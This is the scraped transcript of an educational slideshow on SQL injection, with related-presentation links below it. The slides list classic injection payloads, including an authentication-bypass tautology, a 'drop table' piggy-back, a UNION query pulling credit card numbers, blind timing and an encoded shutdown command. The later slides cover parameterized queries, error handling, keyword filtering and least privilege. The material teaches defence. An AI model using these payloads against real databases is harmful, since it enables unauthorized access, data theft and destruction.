Presentation is loading. Please wait.

Presentation is loading. Please wait.

SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion.

Published byElfreda Rich Modified over 8 years ago

Similar presentations

Presentation on theme: "SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion."— Presentation transcript:

1 SQL Injection Attacks S Vinay Kumar, 07012D0506

2 Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion

3 What is a SQL Injection? The ability to inject SQL commands into the database engine through an existing application

4 Classification of Attacks Identifying Database Finger-Print Identifying Injectable Parameters Discovering Database Schema Bypassing Authentication Extracting/Modifying Database Data Downloading/Uploading File Executing Remote Commands Escalating Privilege

5 Attack Techniques

6 1.Tautology : Exploit where clause Usual login Query: SELECT * FROM acct WHERE login = 'raju' AND password = '123' JSP login query syntax var sql = "SELECT * FROM users WHERE login = '" + usr + "' AND password = '" + pwd + "'";

7 Injecting through input string usr = ' or 1=1 – – pwd = anything Final query would look like this: SELECT * FROM acct WHERE username = ' ' or 1=1 – – ' AND password = 'anything'

8

9 2.Piggy-backed Query: Injecting through input string usr = xyz pwd = 0;drop table users Final query would look like this: SELECT * FROM acct WHERE username = ' xyz ' AND password = 0;drop table users

10 3.Union Query: To retrieve specific information Injecting through input string usr = ' UNION SELECT cardNo from CreditCards where acctNo = 7032 -- pwd = anything Final query would look like this: SELECT * FROM acct WHERE username = ‘ ‘UNION SELECT cardNo from CreditCards where acctNo = 7032 -- ’AND password = anything

11 4.Malformed Query: Also called Second-order Injection Injecting through input string usr = xyz pwd = convert (int,(select top 1 name from sysobjects where xtype = ‘u’)) Final query would look like this: SELECT * FROM acct WHERE username = ‘xyz‘ AND password = convert (int,(select top 1 name from sysobjects where xtype = ‘u’))

12 SQL Server may return the following error: “Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value ’CreditCards’ to a column of data type int

13 5.Inference Based Attacks: Also Blind Injection Injecting in input string usr = legalUser ‘ AND ASCII(SUBSTRING ((select top 1 name from sysobjects ), 1,1 )) >X WAITFOR 5 - - pwd = anything Final query would look like this: SELECT * FROM acct WHERE username = ‘legalUser ‘ AND ASCII(SUBSTRING ((select top 1 name from sysobjects ), 1,1 )) >X WAITFOR 5 - - AND password = anything

14 6.Alternate Encodings: Injecting through input string usr = pwd = 0; exec(char(0x73687574646f776e)) Final query would look like this: SELECT * FROM acct WHERE username = ' ' AND password = 0; exec(char(0x73687574646f776e)) Shutdown cmd

15 Prevention Techniques

16 1. Use Parameterized Queries Separates data from query Allow creation of static queries with bind variables

17 String custname = request.getParameter("customerName"); // perform input validation on custname to detect attacks String query = "SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( );

18 2. Customized Error Messages Knowing database schema makes attacker’s job easier. Avoid display detailed error messages and stack traces to external users.

19 3.White List Based Validation Involves defining exactly what IS authorized Allow input within well-defined set of safe values –By defining a very strong validation pattern Implement stringent "known bad" filters –Eg: Reject "select", "insert", "update", "shutdown", "delete", "drop", "--", “’“

20 4.Limiting Privileges Admin type access rights to the application accounts must be avoided Create a view that limits access to that portion of the data

21 5.Other preventions Validate and filter the input data using strong Regular expression patterns System Stored Procedure Reduction Encrypting Sensitive Data

22 Conclusion Present day development is more focused on Web Applications so there is an urgent need for educating the developers & Students on SQL Injection thereby allowing programmers and system administrators to understand the attacks more thoroughly, more attacks will be detected and more countermeasures will be introduced into the systems

23 Thank You Queries ?

Download ppt "SQL Injection Attacks S Vinay Kumar, 07012D0506. Outline SQL Injection ? Classification of Attacks Attack Techniques Prevention Techniques Conclusion."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
ITEC403 Graduation Project Applications’ Security – Cem Yağlı.

ITEC403 Graduation Project Applications’ Security – Cem Yağlı.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.

Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
SQL Injection and Buffer overflow

SQL Injection and Buffer overflow
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Sql Server Advanced Features MIS 424 Professor Sandvig.

Sql Server Advanced Features MIS 424 Professor Sandvig.
{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.

{ Code Injection Cable Johnson.  Overview  Common Injection Types  Developer Prevention Code Injection.
Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.

Check That Input Preventing SQL Injection Attacks By Andrew Morton For CS 410.
MIS 5211.001 Week 11 Site:

MIS Week 11 Site:
OWASP Zed Attack Proxy Project Lead

OWASP Zed Attack Proxy Project Lead
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
CSCI 6962: Server-side Design and Programming JDBC Database Programming.

CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.

Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
SQL INJECTION COUNTERMEASURES &

SQL INJECTION COUNTERMEASURES &

Similar presentations

Ads by Google